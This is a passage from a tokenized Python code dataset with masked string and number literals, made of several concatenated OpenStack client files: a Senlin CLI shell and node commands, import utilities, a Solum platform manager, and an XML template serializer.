) <EOL> api_ver = options . senlin_api_version <EOL> LOG . info ( api_ver ) <EOL> subcommand_parser = self . get_subcommand_parser ( base_parser , api_ver ) <EOL> self . parser = subcommand_parser <EOL> if not args and options . help or not argv : <EOL> self . do_help ( options ) <EOL> return <NUM_LIT:0> <EOL> args = subcommand_parser . parse_args ( argv ) <EOL> if args . func == self . do_help : <EOL> self . do_help ( args ) <EOL> return <NUM_LIT:0> <EOL> elif args . func == self . do_bash_completion : <EOL> self . do_bash_completion ( args ) <EOL> return <NUM_LIT:0> <EOL> self . _check_identity_arguments ( args ) <EOL> sc = self . _setup_senlin_client ( api_ver , args ) <EOL> profile = osprofiler_profiler and options . profile <EOL> if profile : <EOL> osprofiler_profiler . init ( options . profile ) <EOL> args . func ( sc . service , args ) <EOL> if profile : <EOL> trace_id = osprofiler_profiler . get ( ) . get_base_id ( ) <EOL> print ( _ ( "<STR_LIT>" ) % trace_id ) <EOL> print ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % trace_id ) <EOL> def main ( args = None ) : <EOL> try : <EOL> if args is None : <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> SenlinShell ( ) . main ( args ) <EOL> except KeyboardInterrupt : <EOL> print ( _ ( "<STR_LIT>" ) , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT> ) <EOL> except Exception as e : <EOL> if '<STR_LIT>' in args or '<STR_LIT>' in args : <EOL> raise <EOL> else : <EOL> print ( encodeutils . safe_encode ( six . text_type ( e ) ) , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import six <EOL> import sys <EOL> from cliff import command <EOL> from cliff import lister <EOL> from cliff import show <EOL> from openstack import exceptions as sdk_exc <EOL> from openstackclient . common import exceptions as exc <EOL> from openstackclient . common import utils <EOL> from senlinclient . common . i18n import _ <EOL> from senlinclient . common . i18n import _LI <EOL> from senlinclient . common import utils as senlin_utils <EOL> class ListNode ( lister . Lister ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( ListNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> action = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> columns = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:index>' , '<STR_LIT:status>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> queries = { <EOL> '<STR_LIT>' : parsed_args . cluster , <EOL> '<STR_LIT>' : parsed_args . sort , <EOL> '<STR_LIT>' : parsed_args . limit , <EOL> '<STR_LIT>' : parsed_args . marker , <EOL> '<STR_LIT>' : parsed_args . global_project , <EOL> } <EOL> if parsed_args . filters : <EOL> queries . update ( senlin_utils . format_parameters ( parsed_args . filters ) ) <EOL> nodes = senlin_client . nodes ( ** queries ) <EOL> if not parsed_args . full_id : <EOL> formatters = { <EOL> '<STR_LIT:id>' : lambda x : x [ : <NUM_LIT:8> ] , <EOL> '<STR_LIT>' : lambda x : x [ : <NUM_LIT:8> ] if x else '<STR_LIT>' , <EOL> '<STR_LIT>' : lambda x : x [ : <NUM_LIT:8> ] if x else '<STR_LIT>' <EOL> } <EOL> else : <EOL> formatters = { } <EOL> return ( <EOL> columns , <EOL> ( utils . get_item_properties ( n , columns , formatters = formatters ) <EOL> for n in nodes ) <EOL> ) <EOL> class ShowNode ( show . ShowOne ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( ShowNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> default = False , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> return _show_node ( senlin_client , parsed_args . node , parsed_args . details ) <EOL> def _show_node ( senlin_client , node_id , show_details = False ) : <EOL> """<STR_LIT>""" <EOL> args = { '<STR_LIT>' : True } if show_details else None <EOL> try : <EOL> node = senlin_client . get_node ( node_id , args = args ) <EOL> except sdk_exc . ResourceNotFound : <EOL> raise exc . CommandError ( _ ( '<STR_LIT>' ) % node_id ) <EOL> formatters = { <EOL> '<STR_LIT>' : senlin_utils . json_formatter , <EOL> '<STR_LIT:data>' : senlin_utils . json_formatter , <EOL> } <EOL> if show_details and node : <EOL> formatters [ '<STR_LIT>' ] = senlin_utils . nested_dict_formatter ( <EOL> list ( node [ '<STR_LIT>' ] . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT:value>' ] ) <EOL> columns = sorted ( list ( six . iterkeys ( node ) ) ) <EOL> return columns , utils . get_dict_properties ( node . to_dict ( ) , columns , <EOL> formatters = formatters ) <EOL> class CreateNode ( show . ShowOne ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( CreateNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> required = True , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> action = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:name>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> attrs = { <EOL> '<STR_LIT:name>' : parsed_args . name , <EOL> '<STR_LIT>' : parsed_args . cluster , <EOL> '<STR_LIT>' : parsed_args . profile , <EOL> '<STR_LIT>' : parsed_args . role , <EOL> '<STR_LIT>' : senlin_utils . format_parameters ( parsed_args . metadata ) , <EOL> } <EOL> node = senlin_client . create_node ( ** attrs ) <EOL> return _show_node ( senlin_client , node . id ) <EOL> class UpdateNode ( show . ShowOne ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( UpdateNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> action = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> node = senlin_client . find_node ( parsed_args . node ) <EOL> if node is None : <EOL> raise exc . CommandError ( _ ( '<STR_LIT>' ) % parsed_args . node ) <EOL> attrs = { <EOL> '<STR_LIT:name>' : parsed_args . name , <EOL> '<STR_LIT>' : parsed_args . role , <EOL> '<STR_LIT>' : parsed_args . profile , <EOL> '<STR_LIT>' : senlin_utils . format_parameters ( parsed_args . metadata ) , <EOL> } <EOL> senlin_client . update_node ( node . id , ** attrs ) <EOL> return _show_node ( senlin_client , node . id ) <EOL> class DeleteNode ( command . Command ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( DeleteNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> try : <EOL> if not parsed_args . force and sys . stdin . isatty ( ) : <EOL> sys . stdout . write ( <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> prompt_response = sys . stdin . readline ( ) . lower ( ) <EOL> if not prompt_response . startswith ( '<STR_LIT:y>' ) : <EOL> return <EOL> except KeyboardInterrupt : <EOL> self . log . info ( _LI ( '<STR_LIT>' ) ) <EOL> return <EOL> except EOFError : <EOL> self . log . info ( _LI ( '<STR_LIT>' ) ) <EOL> return <EOL> failure_count = <NUM_LIT:0> <EOL> for nid in parsed_args . node : <EOL> try : <EOL> senlin_client . delete_node ( nid , False ) <EOL> except Exception as ex : <EOL> failure_count += <NUM_LIT:1> <EOL> print ( ex ) <EOL> if failure_count : <EOL> raise exc . CommandError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % <EOL> { '<STR_LIT:count>' : failure_count , <EOL> '<STR_LIT>' : len ( parsed_args . node ) } ) <EOL> print ( '<STR_LIT>' ) <EOL> class CheckNode ( command . Command ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( CheckNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> for nid in parsed_args . node : <EOL> try : <EOL> resp = senlin_client . check_node ( nid ) <EOL> except sdk_exc . ResourceNotFound : <EOL> raise exc . CommandError ( _ ( '<STR_LIT>' ) % nid ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : nid , '<STR_LIT:action>' : resp [ '<STR_LIT:action>' ] } ) <EOL> class RecoverNode ( command . Command ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ + "<STR_LIT>" ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( RecoverNode , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = _ ( '<STR_LIT>' ) <EOL> ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> self . log . debug ( "<STR_LIT>" , parsed_args ) <EOL> senlin_client = self . app . client_manager . clustering <EOL> for nid in parsed_args . node : <EOL> try : <EOL> resp = senlin_client . recover_node ( nid ) <EOL> except sdk_exc . ResourceNotFound : <EOL> raise exc . CommandError ( _ ( '<STR_LIT>' ) % nid ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : nid , '<STR_LIT:action>' : resp [ '<STR_LIT:action>' ] } ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import traceback <EOL> def import_class ( import_str ) : <EOL> """<STR_LIT>""" <EOL> mod_str , _sep , class_str = import_str . rpartition ( '<STR_LIT:.>' ) <EOL> __import__ ( mod_str ) <EOL> try : <EOL> return getattr ( sys . modules [ mod_str ] , class_str ) <EOL> except AttributeError : <EOL> raise ImportError ( '<STR_LIT>' % <EOL> ( class_str , <EOL> traceback . format_exception ( * sys . exc_info ( ) ) ) ) <EOL> def import_object ( import_str , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return import_class ( import_str ) ( * args , ** kwargs ) <EOL> def import_object_ns ( name_space , import_str , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> import_value = "<STR_LIT>" % ( name_space , import_str ) <EOL> try : <EOL> return import_class ( import_value ) ( * args , ** kwargs ) <EOL> except ImportError : <EOL> return import_class ( import_str ) ( * args , ** kwargs ) <EOL> def import_module ( import_str ) : <EOL> """<STR_LIT>""" <EOL> __import__ ( import_str ) <EOL> return sys . modules [ import_str ] <EOL> def import_versioned_module ( version , submodule = None ) : <EOL> module = '<STR_LIT>' % version <EOL> if submodule : <EOL> module = '<STR_LIT:.>' . join ( ( module , submodule ) ) <EOL> return import_module ( module ) <EOL> def try_import ( import_str , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return import_module ( import_str ) <EOL> except ImportError : <EOL> return default </s>
<s> from solumclient . openstack . common . apiclient import base <EOL> class Platform ( base . Resource ) : <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . _info <EOL> class PlatformManager ( base . BaseManager ) : <EOL> resource_class = Platform <EOL> def get ( self , ** kwargs ) : <EOL> return self . _get ( '<STR_LIT>' ) </s>
<s> import pkg_resources <EOL> try : <EOL> version_string = pkg_resources . get_provider ( <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) . version <EOL> except pkg_resources . DistributionNotFound : <EOL> import pbr . version <EOL> version_string = str ( pbr . version . VersionInfo ( '<STR_LIT>' ) ) </s>
<s> import os . path <EOL> from lxml import etree <EOL> import six <EOL> from xml . dom import minidom <EOL> from xml . parsers import expat <EOL> from xml import sax <EOL> from xml . sax import expatreader <EOL> from rack import exception <EOL> from rack . openstack . common . gettextutils import _ <EOL> from rack import utils <EOL> XMLNS_V10 = '<STR_LIT>' <EOL> XMLNS_V11 = '<STR_LIT>' <EOL> XMLNS_COMMON_V10 = '<STR_LIT>' <EOL> XMLNS_ATOM = '<STR_LIT>' <EOL> def validate_schema ( xml , schema_name , version = '<STR_LIT>' ) : <EOL> if isinstance ( xml , str ) : <EOL> xml = etree . fromstring ( xml ) <EOL> base_path = '<STR_LIT>' <EOL> if schema_name not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> base_path += '<STR_LIT>' % version <EOL> schema_path = os . path . join ( utils . rackdir ( ) , <EOL> '<STR_LIT>' % ( base_path , schema_name ) ) <EOL> schema_doc = etree . parse ( schema_path ) <EOL> relaxng = etree . RelaxNG ( schema_doc ) <EOL> relaxng . assertValid ( xml ) <EOL> class Selector ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * chain ) : <EOL> """<STR_LIT>""" <EOL> self . chain = chain <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" + repr ( self . chain ) <EOL> def __call__ ( self , obj , do_raise = False ) : <EOL> """<STR_LIT>""" <EOL> for elem in self . chain : <EOL> if callable ( elem ) : <EOL> obj = elem ( obj ) <EOL> else : <EOL> if obj == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> try : <EOL> obj = obj [ elem ] <EOL> except ( KeyError , IndexError ) : <EOL> if do_raise : <EOL> raise KeyError ( elem ) <EOL> return None <EOL> return obj <EOL> def get_items ( obj ) : <EOL> """<STR_LIT>""" <EOL> return list ( obj . items ( ) ) <EOL> def get_items_without_dict ( obj ) : <EOL> """<STR_LIT>""" <EOL> obj_list = list ( obj . items ( ) ) <EOL> for item in obj_list : <EOL> if isinstance ( list ( item ) [ <NUM_LIT:1> ] , dict ) : <EOL> obj_list . remove ( item ) <EOL> return obj_list <EOL> class EmptyStringSelector ( Selector ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , obj , do_raise = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return super ( EmptyStringSelector , self ) . __call__ ( obj , True ) <EOL> except KeyError : <EOL> return "<STR_LIT>" <EOL> class ConstantSelector ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . value = value <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return repr ( self . value ) <EOL> def __call__ ( self , _obj , _do_raise = False ) : <EOL> """<STR_LIT>""" <EOL> return self . value <EOL> class TemplateElement ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag , attrib = None , selector = None , subselector = None , <EOL> colon_ns = False , ** extra ) : <EOL> """<STR_LIT>""" <EOL> if selector is None : <EOL> selector = Selector ( ) <EOL> elif not callable ( selector ) : <EOL> selector = Selector ( selector ) <EOL> if subselector is not None and not callable ( subselector ) : <EOL> subselector = Selector ( subselector ) <EOL> self . tag = tag <EOL> self . selector = selector <EOL> self . subselector = subselector <EOL> self . attrib = { } <EOL> self . _text = None <EOL> self . _children = [ ] <EOL> self . _childmap = { } <EOL> self . colon_ns = colon_ns <EOL> if not attrib : <EOL> attrib = { } <EOL> attrib . update ( extra ) <EOL> for k , v in attrib . items ( ) : <EOL> self . set ( k , v ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( '<STR_LIT>' % <EOL> ( self . __class__ . __module__ , self . __class__ . __name__ , <EOL> self . tag , id ( self ) ) ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _children ) <EOL> def __contains__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return key in self . _childmap <EOL> def __getitem__ ( self , idx ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( idx , six . string_types ) : <EOL> return self . _childmap [ idx ] <EOL> else : <EOL> return self . _children [ idx ] <EOL> def append ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> elem = elem . unwrap ( ) <EOL> if elem . tag in self . _childmap : <EOL> raise KeyError ( elem . tag ) <EOL> self . _children . append ( elem ) <EOL> self . _childmap [ elem . tag ] = elem <EOL> def extend ( self , elems ) : <EOL> """<STR_LIT>""" <EOL> elemmap = { } <EOL> elemlist = [ ] <EOL> for elem in elems : <EOL> elem = elem . unwrap ( ) <EOL> if elem . tag in self . _childmap or elem . tag in elemmap : <EOL> raise KeyError ( elem . tag ) <EOL> elemmap [ elem . tag ] = elem <EOL> elemlist . append ( elem ) <EOL> self . _children . extend ( elemlist ) <EOL> self . _childmap . update ( elemmap ) <EOL> def insert ( self , idx , elem ) : <EOL> """<STR_LIT>""" <EOL> elem = elem . unwrap ( ) <EOL> if elem . tag in self . _childmap : <EOL> raise KeyError ( elem . tag ) <EOL> self . _children . insert ( idx , elem ) <EOL> self . _childmap [ elem . tag ] = elem <EOL> def remove ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> elem = elem . unwrap ( ) <EOL> if elem . tag not in self . _childmap or self . _childmap [ elem . tag ] != elem : <EOL> raise ValueError ( _ ( '<STR_LIT>' ) ) <EOL> self . _children . remove ( elem ) <EOL> del self . _childmap [ elem . tag ] <EOL> def get ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . attrib [ key ] <EOL> def set ( self , key , value = None ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> value = Selector ( key ) <EOL> elif not callable ( value ) : <EOL> value = Selector ( value ) <EOL> self . attrib [ key ] = value <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . attrib . keys ( ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . attrib . items ( ) <EOL> def unwrap ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def wrap ( self ) : <EOL> """<STR_LIT>""" <EOL> return Template ( self ) <EOL> def apply ( self , elem , obj ) : <EOL> """<STR_LIT>""" <EOL> if self . text is not None : <EOL> elem . text = unicode ( self . text ( obj ) ) <EOL> for key , value in self . attrib . items ( ) : <EOL> try : <EOL> elem . set ( key , unicode ( value ( obj , True ) ) ) <EOL> except KeyError : <EOL> pass <EOL> def _render ( self , parent , datum , patches , nsmap ) : <EOL> """<STR_LIT>""" <EOL> if callable ( self . tag ) : <EOL> tagname = self . tag ( datum ) <EOL> else : <EOL> tagname = self . tag <EOL> if self . colon_ns : <EOL> if '<STR_LIT::>' in tagname : <EOL> if nsmap is None : <EOL> nsmap = { } <EOL> colon_key , colon_name = tagname . split ( '<STR_LIT::>' ) <EOL> nsmap [ colon_key ] = colon_key <EOL> tagname = '<STR_LIT>' % ( colon_key , colon_name ) <EOL> elem = etree . Element ( tagname , nsmap = nsmap ) <EOL> if parent is not None : <EOL> parent . append ( elem ) <EOL> if datum is None : <EOL> return elem <EOL> self . apply ( elem , datum ) <EOL> for patch in patches : <EOL> patch . apply ( elem , datum ) <EOL> return elem <EOL> def render ( self , parent , obj , patches = [ ] , nsmap = None ) : <EOL> """<STR_LIT>""" <EOL> data = None if obj is None else self . selector ( obj ) <EOL> if not self . will_render ( data ) : <EOL> return [ ] <EOL> elif data is None : <EOL> return [ ( self . _render ( parent , None , patches , nsmap ) , None ) ] <EOL> if not isinstance ( data , list ) : <EOL> data = [ data ] <EOL> elif parent is None : <EOL> raise ValueError ( _ ( '<STR_LIT>' ) ) <EOL> elems = [ ] <EOL> for datum in data : <EOL> if self . subselector is not None : <EOL> datum = self . subselector ( datum ) <EOL> elems . append ( ( self . _render ( parent , datum , patches , nsmap ) , datum ) ) <EOL> return elems <EOL> def will_render ( self , datum ) : <EOL> """<STR_LIT>""" <EOL> return datum is not None <EOL> def _text_get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _text <EOL> def _text_set ( self , value ) : <EOL> if value is not None and not callable ( value ) : <EOL> value = Selector ( value ) <EOL> self . _text = value <EOL> def _text_del ( self ) : <EOL> self . _text = None <EOL> text = property ( _text_get , _text_set , _text_del ) <EOL> def tree ( self ) : <EOL> """<STR_LIT>""" <EOL> contents = [ self . tag , '<STR_LIT>' % self . selector ] <EOL> if self . text is not None : <EOL> contents . append ( '<STR_LIT>' % self . text ) <EOL> for key , value in self . attrib . items ( ) : <EOL> contents . append ( '<STR_LIT>' % ( key , value ) ) <EOL> if len ( self ) == <NUM_LIT:0> : <EOL> return '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( [ str ( i ) for i in contents ] ) <EOL> children = [ c . tree ( ) for c in self ] <EOL> return ( '<STR_LIT>' % <EOL> ( '<STR_LIT:U+0020>' . join ( contents ) , '<STR_LIT>' . join ( children ) , self . tag ) ) <EOL> def SubTemplateElement ( parent , tag , attrib = None , selector = None , <EOL> subselector = None , colon_ns = False , ** extra ) : <EOL> """<STR_LIT>""" <EOL> attrib = attrib or { } <EOL> attrib . update ( extra ) <EOL> elem = TemplateElement ( tag , attrib = attrib , selector = selector , <EOL> subselector = subselector , colon_ns = colon_ns ) <EOL> if parent is not None : <EOL> parent . append ( elem ) <EOL> return elem <EOL> class Template ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , root , nsmap = None ) : <EOL> """<STR_LIT>""" <EOL> self . root = root . unwrap ( ) if root is not None else None <EOL> self . nsmap = nsmap or { } <EOL> self . serialize_options = dict ( encoding = '<STR_LIT>' , xml_declaration = True ) <EOL> def _serialize ( self , parent , obj , siblings , nsmap = None ) : <EOL> """<STR_LIT>""" <EOL> elems = siblings [ <NUM_LIT:0> ] . render ( parent , obj , siblings [ <NUM_LIT:1> : ] , nsmap ) <EOL> seen = set ( ) <EOL> for idx , sibling in enumerate ( siblings ) : <EOL> for child in sibling : <EOL> if child . tag in seen : <EOL> continue <EOL> seen . add ( child . tag ) <EOL> nieces = [ child ] <EOL> for sib in siblings [ idx + <NUM_LIT:1> : ] : <EOL> if child . tag in sib : <EOL> nieces . append ( sib [ child . tag ] ) <EOL> for elem , datum in elems : <EOL> self . _serialize ( elem , datum , nieces ) <EOL> if elems : <EOL> return elems [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> def serialize ( self , obj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> elem = self . make_tree ( obj ) <EOL> if elem is None : <EOL> return '<STR_LIT>' <EOL> for k , v in self . serialize_options . items ( ) : <EOL> kwargs . setdefault ( k , v ) <EOL> return etree . tostring ( elem , * args , ** kwargs ) <EOL> def make_tree ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if self . root is None : <EOL> return None <EOL> siblings = self . _siblings ( ) <EOL> nsmap = self . _nsmap ( ) <EOL> return self . _serialize ( None , obj , siblings , nsmap ) <EOL> def _siblings ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self . root ] <EOL> def _nsmap ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . nsmap . copy ( ) <EOL> def unwrap ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . root <EOL> def wrap ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def apply ( self , master ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def tree ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self , self . root . tree ( ) ) <EOL> class MasterTemplate ( Template ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , root , version , nsmap = None ) : <EOL> """<STR_LIT>""" <EOL> super ( MasterTemplate , self ) . __init__ ( root , nsmap ) <EOL> self . version = version <EOL> self . slaves = [ ] <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( "<STR_LIT>" % <EOL> ( self . __class__ . __module__ , self . __class__ . __name__ , <EOL> self . version , id ( self ) ) ) <EOL> def _siblings ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self . root ] + [ slave . root for slave in self . slaves ] <EOL> def _nsmap ( self ) : <EOL> """<STR_LIT>""" <EOL> nsmap = self . nsmap . copy ( ) <EOL> for slave in self . slaves : <EOL> nsmap . update ( slave . _nsmap ( ) ) <EOL> return nsmap <EOL> def attach ( self , * slaves ) : <EOL> """<STR_LIT>""" <EOL> slave_list = [ ] <EOL> for slave in slaves : <EOL> slave = slave . wrap ( ) <EOL> if slave . root . tag != self . root . tag : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : slave . root . tag , <EOL> '<STR_LIT>' : self . root . tag } <EOL> raise ValueError ( msg ) <EOL> if not slave . apply ( self ) : <EOL> continue <EOL> slave_list . append ( slave ) <EOL> self . slaves . extend ( slave_list ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp = self . __class__ ( self . root , self . version , self . nsmap ) <EOL> tmp . slaves = self . slaves [ : ] <EOL> return tmp <EOL> class SlaveTemplate ( Template ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , root , min_vers , max_vers = None , nsmap = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SlaveTemplate , self ) . __init__ ( root , nsmap ) <EOL> self . min_vers = min_vers <EOL> self . max_vers = max_vers <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( "<STR_LIT>" % <EOL> ( self . __class__ . __module__ , self . __class__ . __name__ , <EOL> self . min_vers , self . max_vers , id ( self ) ) ) <EOL> def apply ( self , master ) : <EOL> """<STR_LIT>""" 